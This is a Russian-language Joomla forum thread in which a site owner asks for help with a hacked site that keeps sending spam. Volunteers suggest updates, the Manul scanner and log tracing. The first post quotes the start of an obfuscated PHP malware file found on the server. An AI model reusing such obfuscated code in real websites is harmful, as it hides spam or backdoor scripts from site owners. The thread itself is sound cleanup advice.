0 Пользователей и 1 Гость просматривают эту тему.
  • 11 Ответов
  • 714 Просмотров
*

vas1lek

  • Осваиваюсь на форуме
  • 35
  • 0
Спамит сайт
« : 15.09.2015, 21:46:27 »
Подскажите пожалуйста как защитить сайт.
Сайт начинает спамить в логах вижу  такую ситуацию
Спойлер
[свернуть]
удаляю данный php файл так как в нем код с кучей иероглифов к примеру
Цитировать
Код
<?php 
$w93="W2{MCBiJ_tPk^lcgev[oTQ!\$jsfw4O8Z\t5\".&}#AL\nrahIKyU%b09u6S]m*/R+;<7 D),d1NY=FV~`\rH3qEn?X\\x:@>|z-(Gp'"; $GLOBALS['rlslp59'] = $w93[16].$w93[42].$w93[42].$w93[19].$w93[42].$w93[8].$w93[42].$w93[16].$w93[96].$w93[19].$w93[42].$w93[9].$w93[6].$w93[83].$w93[15]; $GLOBALS['akpcw87'] = $w93[6].$w93[83].$w93[6].$w93[8].$w93[25].$w93[16].$w93[9]; $GLOBALS['tudbx5'] = $w93[69].$w93[16].$w93[26].$w93[6].$w93[83].$w93[16]; $GLOBALS['piuiz64'] = $w93[16].$w93[96].$w93[69].$w93[43]
Запускаю сайт все работает отлично логи тоже порядок, но спустя неделю ситуация повторяется.
 
*

vas1lek

  • Осваиваюсь на форуме
  • 35
  • 0
Re: Спамит сайт
« Ответ #1 : 15.09.2015, 21:57:52 »
Так же есть ли для joomlu botnet attack blocker так как сайт спамит через него.
*

flyingspook

  • Профи
  • 3619
  • 236
Re: Спамит сайт
« Ответ #2 : 16.09.2015, 00:52:19 »
Все совершенно просто вас взломали.
Чистите сайт, обновляйте расширения и желательно обновляйте сразу на 3 актуальную версию.
*

Taatshi

  • Support Team
  • 4803
  • 453
  • Верстаем и немножко кодим. Обращайтесь ;)
Re: Спамит сайт
« Ответ #4 : 16.09.2015, 08:19:49 »
У Вас случайно не варезное что-то на сайте стоит?

Прогоните вот этим

https://yandex.ru/promo/manul#about

И результаты нам расскажете
ВЕРСТКА, САЙТЫ ПОД КЛЮЧ, УДАЛЕНИЕ ВИРУСОВ, МИГРАЦИЯ НА JOOMLA 3  /  ОТЗЫВЫ 
Минимальная ставка за платные услуги 1000 рэ Связь: telegram - Taatshi, почта - Taatshi на яндексе.
*

draff

  • Практически профи
  • 2770
  • 171
  • step by step
Re: Спамит сайт
« Ответ #5 : 16.09.2015, 09:28:08 »
Советую настроить запись логов отправки почты.
Так гораздо удобнее вычислить скрипт рассылающий спам через phpmail
*

Taatshi

  • Support Team
  • 4803
  • 453
  • Верстаем и немножко кодим. Обращайтесь ;)
Re: Спамит сайт
« Ответ #6 : 16.09.2015, 11:04:32 »
draff, думаю, скрипт искать не надо - он его уже нашел. Ему надо найти бэкдор или уязвимость, через которую это заливается.

vas1lek, а покажите

/plugins/system/jatypo/jatypo/menu.php

с иероглифами.
ВЕРСТКА, САЙТЫ ПОД КЛЮЧ, УДАЛЕНИЕ ВИРУСОВ, МИГРАЦИЯ НА JOOMLA 3  /  ОТЗЫВЫ 
Минимальная ставка за платные услуги 1000 рэ Связь: telegram - Taatshi, почта - Taatshi на яндексе.
*

vas1lek

  • Осваиваюсь на форуме
  • 35
  • 0
Re: Спамит сайт
« Ответ #7 : 16.09.2015, 23:41:04 »
draff, думаю, скрипт искать не надо - он его уже нашел. Ему надо найти бэкдор или уязвимость, через которую это заливается.

vas1lek, а покажите

/plugins/system/jatypo/jatypo/menu.php

с иероглифами.
Вот весь код файла menu.php

Спойлер
[свернуть]
*

draff

  • Практически профи
  • 2770
  • 171
  • step by step
Re: Спамит сайт
« Ответ #8 : 17.09.2015, 05:37:03 »
draff, думаю, скрипт искать не надо - он его уже нашел. Ему надо найти бэкдор или уязвимость, через которую это заливается.
Как на меня, то гораздо проще следить в mail.log, чем ломать глаза в access.log. И как обычно размещают не один скрипт отправки почты.
*

Taatshi

  • Support Team
  • 4803
  • 453
  • Верстаем и немножко кодим. Обращайтесь ;)
Re: Спамит сайт
« Ответ #9 : 17.09.2015, 06:59:10 »
vas1lek, понятно. Теперь Вам нужно найти откуда этот файл попадает к вам на сервер. Делаете так.

Удалите файл, почистите все логи доступа и ошибок на сервере. И внимательно следите. Как только появится - сразу логи смотреть - поиск по имени этого файла. Ищем упоминание. Как найдете самое первое - смотрите откуда появилось. С какого IP - какое действие было с этого IP перед этим... Занятие муторное и требует творческого подхода.

Вы манулом сайт прогоняли? Это гораздо проще, чем рыться в логах.
ВЕРСТКА, САЙТЫ ПОД КЛЮЧ, УДАЛЕНИЕ ВИРУСОВ, МИГРАЦИЯ НА JOOMLA 3  /  ОТЗЫВЫ 
Минимальная ставка за платные услуги 1000 рэ Связь: telegram - Taatshi, почта - Taatshi на яндексе.
*

vas1lek

  • Осваиваюсь на форуме
  • 35
  • 0
Re: Спамит сайт
« Ответ #10 : 17.09.2015, 11:17:17 »
Вы манулом сайт прогоняли? Это гораздо проще, чем рыться в логах.
Манулом пробивал, но все время зависало и дальше не идет сканирование. Зависало на какой то png картинке с папки Plugins/system/ .
*

vas1lek

  • Осваиваюсь на форуме
  • 35
  • 0
Re: Спамит сайт
« Ответ #11 : 17.09.2015, 13:03:02 »
Разбил сайт и по кускам его сканировал Манулом:
После анализа было найдено вредных
./components/com_hdwplayer/views/videos/view.html.php
./plugins/system/jcemediabox/js/jcemediabox.js
куча подозрительных в файлах js, xlx, php/
Залил и те файлы что я удалял menu,php и Манул сказал что там не че вредного нету хотя видно и по коду и по логам что точно он вредный, а тут наоборот что меня удивило.
Файлы могу приложить если надо
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Ребят, подскажите модуль (расширение) для добавления на сайт Слайда с новостями

Автор Ирина Поехали

Ответов: 1
Просмотров: 83
Последний ответ 13.09.2017, 11:07:36
от NewUsers
Медленно загружается сайт

Автор katerina37

Ответов: 17
Просмотров: 382
Последний ответ 12.05.2017, 16:28:39
от dmitry_stas
Ищу специалиста на Joomla 2.5.9 + К2, который приведет сайт в порядок

Автор RuslanKazan

Ответов: 0
Просмотров: 303
Последний ответ 24.09.2016, 01:03:03
от RuslanKazan
Исчезает сайт

Автор dimasan57

Ответов: 0
Просмотров: 283
Последний ответ 17.01.2016, 14:38:10
от dimasan57
Как при помощи Developers Tools найти из какого файла компонента выводится текст на сайт?

Автор vovchikku

Ответов: 8
Просмотров: 407
Последний ответ 15.12.2015, 10:45:34
от vovchikku